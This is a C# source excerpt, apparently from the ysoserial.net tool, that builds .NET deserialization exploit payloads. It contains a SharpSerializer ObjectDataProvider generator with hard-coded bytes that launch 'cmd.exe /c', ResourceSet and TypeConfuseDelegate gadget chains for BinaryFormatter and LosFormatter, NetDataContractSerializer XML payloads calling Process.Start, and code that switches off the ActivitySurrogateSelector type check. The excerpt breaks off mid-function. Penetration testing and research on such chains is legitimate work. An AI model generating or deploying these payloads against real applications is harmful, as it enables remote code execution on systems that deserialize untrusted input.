private static bool BinaryFormatterDeserializeABFJson(string strJson, bool showInfo)
{
bool noError = true;
try
{
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(strJson);
/*
* ms.Position = 0;
* BinaryFormatter bf = new BinaryFormatter();
* var task = Task.Run(() => bf.Deserialize(ms));
* //*/
var task = Task.Run(() => { try { SerializersHelper.BinaryFormatter_deserialize(ms.ToArray()); } catch (Exception e) { noError = false; } });
if (!task.Wait(TimeSpan.FromSeconds(5)))
{
noError = false;
if (showInfo)
{
Console.WriteLine("The formatter is not responding - infinite loop because of parameters.");
}
}
}
catch (Exception e)
{
noError = false;
}
return(noError);
}
public static MemoryStream MinimiseBFAndRun(Stream binaryFormatted, InputArgs inInputArgs, bool isErrOk, bool showInfo)
{
string json_result = MinimiseJsonAndRun(AdvancedBinaryFormatterParser.StreamToJson(binaryFormatted), inInputArgs, isErrOk, showInfo);
MemoryStream result = AdvancedBinaryFormatterParser.JsonToStream(json_result);
if (showInfo)
{
Console.WriteLine("Size reduced from " + binaryFormatted.Length + " to " + result.Length);
}
result.Position = 0;
return(result);
}
// this has been used as an example to minify the TypeConfuseDelegateGenerator payload!
private void MinimiseTCDJsonAndRun()
{
string myApp = "TestConsoleApp_YSONET";
sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, false, false, true, null);
bool isErrOk = false;
TypeConfuseDelegateGenerator tcdg = new TypeConfuseDelegateGenerator();
byte[] tcd_bf_byte = (byte[])tcdg.GenerateWithNoTest("binaryformatter", sampleInputArgs);
string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true);
byte[] result = BinaryFormatterMinifier.MinimiseBFAndRun(tcd_bf_byte, sampleInputArgs, isErrOk, true);
Console.WriteLine(Encoding.UTF8.GetString(result));
Console.ReadLine();
}
private void TextFormatterMinifying()
{
string myApp = "TestConsoleApp_YSONET";
sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, true, true, true, null);
bool isErrOk = false;
TextFormattingRunPropertiesGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] tcd_bf_byte = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs);
Console.WriteLine("Init size: " + tcd_bf_byte.Length);
string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true);
string result = BinaryFormatterMinifier.MinimiseJsonAndRun(json_string, sampleInputArgs, isErrOk, true);
Console.WriteLine(result);
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(result);
Console.WriteLine("Final size: " + ms.Length);
Console.ReadLine();
}
private void ActivitySurrogateSelector()
{
string myApp = "TestConsoleApp_YSONET";
sampleInputArgs = new InputArgs(myApp + " /foo bar", true, true, true, true, true, null);
bool isErrOk = false;
PayloadClass myPayloadClass = new PayloadClass(1, sampleInputArgs);
List <object> ls = myPayloadClass.GadgetChains();
//*
// Disable ActivitySurrogate type protections during generation
ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
//Serialize(myPayloadClass, "BinaryFormatter", sampleInputArgs);
MemoryStream lsMs = new MemoryStream();
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(lsMs, ls);
//lsMs.Position = 0;
//fmt.Deserialize(lsMs);
byte[] bf_byte = lsMs.ToArray();
Console.WriteLine("Init size: " + bf_byte.Length);
string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(bf_byte), false, true, true);
//MemoryStream msCanIt = AdvancedBinaryFormatterParser.JsonToStream(json_string);
//msCanIt.Position = 0;
//fmt.Deserialize(msCanIt);
string result = BinaryFormatterMinifier.MinimiseJsonAndRun(json_string, sampleInputArgs, isErrOk, true);
Console.WriteLine(result);
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(result);
Console.WriteLine("Final size: " + ms.Length);
Console.ReadLine();
}
/// <summary>
/// Generates the SharpSerializer binary payload with a supplied command.
/// </summary>
/// <param name="command">The command</param>
/// <returns>The payload byte array.</returns>
/// <remarks>
///
/// Standard SharpSerializer version of ObjectDataProvider "calc" serialized object hex view:
///
/// 00000000 01 06 01 04 52 6F 6F 74 01 0E 4F 62 6A 65 63 74 ....Root..Object
/// 00000010 49 6E 73 74 61 6E 63 65 01 09 53 74 61 72 74 49 Instance..StartI
/// 00000020 6E 66 6F 01 08 46 69 6C 65 4E 61 6D 65 01 09 41 nfo..FileName..A
/// 00000030 72 67 75 6D 65 6E 74 73 01 0A 4D 65 74 68 6F 64 rguments..Method
/// 00000040 4E 61 6D 65 01 03 01 80 01 53 79 73 74 65 6D 2E Name...€.System.
/// 00000050 57 69 6E 64 6F 77 73 2E 44 61 74 61 2E 4F 62 6A Windows.Data.Obj
/// 00000060 65 63 74 44 61 74 61 50 72 6F 76 69 64 65 72 2C ectDataProvider,
/// 00000070 20 50 72 65 73 65 6E 74 61 74 69 6F 6E 46 72 61 PresentationFra
/// 00000080 6D 65 77 6F 72 6B 2C 20 56 65 72 73 69 6F 6E 3D mework, Version=
/// 00000090 34 2E 30 2E 30 2E 30 2C 20 43 75 6C 74 75 72 65 4.0.0.0, Culture
/// 000000A0 3D 6E 65 75 74 72 61 6C 2C 20 50 75 62 6C 69 63 =neutral, Public
/// 000000B0 4B 65 79 54 6F 6B 65 6E 3D 33 31 62 66 33 38 35 KeyToken=31bf385
/// 000000C0 36 61 64 33 36 34 65 33 35 01 65 53 79 73 74 65 6ad364e35.eSyste
/// 000000D0 6D 2E 44 69 61 67 6E 6F 73 74 69 63 73 2E 50 72 m.Diagnostics.Pr
/// 000000E0 6F 63 65 73 73 2C 20 53 79 73 74 65 6D 2C 20 56 ocess, System, V
/// 000000F0 65 72 73 69 6F 6E 3D 34 2E 30 2E 30 2E 30 2C 20 ersion=4.0.0.0,
/// 00000100 43 75 6C 74 75 72 65 3D 6E 65 75 74 72 61 6C 2C Culture=neutral,
/// 00000110 20 50 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D PublicKeyToken=
/// 00000120 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 b77a5c561934e089
/// 00000130 00 02 00 00 01 02 02 01 01 01 01 01 01 02 01 02 ................
/// 00000140 01 02 01 02 06 01 03 01 02 01 07 63 6D 64 2E 65 ...........cmd.e
/// 00000150 78 65 06 01 04 01 02 01 07 2F 63 20 63 61 6C 63 xe......./c calc
/// 00000160 06 01 05 01 02 01 05 53 74 61 72 74 .......Start
///
/// </remarks>
internal static byte[] GenerateSharpSerializerBinaryPayload(string command)
{
if (command == null)
{
command = string.Empty;
}
// First chunk of binary-serialized ObjectDataProvider bytes.
IEnumerable <byte> firstPayloadPart =
Convert.FromBase64String("" +
"AQYBBFJvb3QBDk9iamVjdEluc3RhbmNlAQlTdGFydEluZm8BCEZpbGVOYW1lAQlB" +
"cmd1bWVudHMBCk1ldGhvZE5hbWUBAwGAAVN5c3RlbS5XaW5kb3dzLkRhdGEuT2Jq" +
"ZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249" +
"NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1" +
"NmFkMzY0ZTM1AWVTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBW" +
"ZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49" +
"Yjc3YTVjNTYxOTM0ZTA4OQACAAABAgIBAQEBAQECAQIBAgECBgEDAQIBB2NtZC5l" +
"eGUGAQQBAgE=");
// Bytes that include the cmd, arguments and length data.
// [2 bytes 7-bit-encoded length]["/c "][<cmd>]
byte[] cmdArgumentsPartBytes = Encoding.ASCII.GetBytes("/c ");
byte[] commandBytes = Encoding.ASCII.GetBytes(command);
IEnumerable <byte> commandLengthBytes = AdvancedBinaryFormatterParser.Calculate7BitEncodedInt(cmdArgumentsPartBytes.Length + commandBytes.Length);
// Second chunk of binary-serialized ObjectDataProvider bytes.
IEnumerable <byte> secondPayloadPart =
Convert.FromBase64String(
"BgEFAQIBBVN0YXJ0");
List <byte> payload = new List <byte>();
payload.AddRange(firstPayloadPart);
payload.AddRange(commandLengthBytes);
payload.AddRange(cmdArgumentsPartBytes);
payload.AddRange(commandBytes);
payload.AddRange(secondPayloadPart);
return(payload.ToArray());
}
public override object Generate(string formatter, InputArgs inputArgs)
{
/*
* // This is how ResourceSet can be used directly but the payload would fire!
* object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
*
* using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources"))
* {
* rw.AddResource("", generatedPayload);
* rw.Generate();
* rw.Close();
* }
*
* // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this
* ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources");
*
* // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it
*
* //*/
//TestMore(inputArgs);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
string payload = "";
// This to prevent code execution when running
byte[] bfSerializedObj;
if (internalgadget == 1)
{
// This is an example of using SimpleBinaryFormatterParser
//
string obj25Type = "", obj25Value = "", obj26Value = "";
byte[] cmdFile7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName);
byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 };
obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV));
if (inputArgs.HasArguments)
{
byte[] obj25TypeByte = new byte[] { 0x06 };
byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 };
byte[] cmdArgs7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments);
obj25Type = Convert.ToBase64String(obj25TypeByte);
obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV));
}
else
{
byte[] obj25TypeByte = new byte[] { 0x09 };
byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 };
obj25Type = Convert.ToBase64String(obj25TypeByte);
obj25Value = Convert.ToBase64String(obj25ValueObjId);
}
payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAAAA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}";
bfSerializedObj = SimpleBinaryFormatterParser.JsonToStream(payload).ToArray();
}
else
{
// This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer
// In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first
ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
if (inputArgs.Minify)
{
xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
}
xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload);
// This payload has been minified manually too by removing some of the unnecessary items!
payload = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 1,
'name': 'System.Resources.ResourceSet',
'numMembers': 2,
'memberNames':['',''],
'binaryTypeEnumA':[3,3],
'typeInformationA':[null,null],
'typeInformationB':['',''],
'memberAssemIds':[0,0],
'assemId': 0
}},{'Id': 3,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 2
}},{'Id': 4,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 5,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 2,
'name': 'System.Collections.Hashtable',
'numMembers': 5,
'memberNames':['LoadFactor','Version','Comparer','','HashSize'],
'binaryTypeEnumA':[0,0,3,3,0],
'typeInformationA':[11,8,null,null,8],
'typeInformationB':[11,8,'','',8],
'memberAssemIds':[0,0,0,0,0],
'assemId': 0
}},{'Id': 6,
'TypeName': 'Single',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 11,
'value': 0
}},{'Id': 7,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 1
}},{'Id': 8,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 9,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 1
}},{'Id': 10,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 3
}},{'Id': 11,
'TypeName': 'Assembly',
'Data': {
'$type': 'BinaryAssembly',
'assemId': 7,
'assemblyString': 'Microsoft.PowerShell.Editor'
}},{'Id': 12,
'TypeName': 'ObjectWithMapTypedAssemId',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 5,
'objectId': 6,
'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties',
'numMembers': 1,
'memberNames':['ForegroundBrush'],
'binaryTypeEnumA':[1],
'typeInformationA':[null],
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 7
}},{'Id': 13,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 8,
'value': '" + xaml_payload + @"'
}},{'Id': 14,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray();
}
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
if (inputArgs.Test)
{
try
{
MemoryStream ms = new MemoryStream(bfSerializedObj);
ms.Position = 0;
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
bf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(bfSerializedObj);
}
else
{
// it is LosFormatter
byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj);
MemoryStream ms = new MemoryStream(lfSerializedObj);
ms.Position = 0;
if (inputArgs.Test)
{
try
{
System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
lf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(lfSerializedObj);
}
//return Serialize(myResourceSet, formatter, inputArgs);
}
else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
string ndcPayload = "";
if (internalgadget == 1)
{
string cmdPart = "";
if (inputArgs.HasArguments)
{
cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>";
}
else
{
cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>";
}
ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>";
}
else
{
ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
if (inputArgs.Minify)
{
xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
}
ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>";
//</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm!
}
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
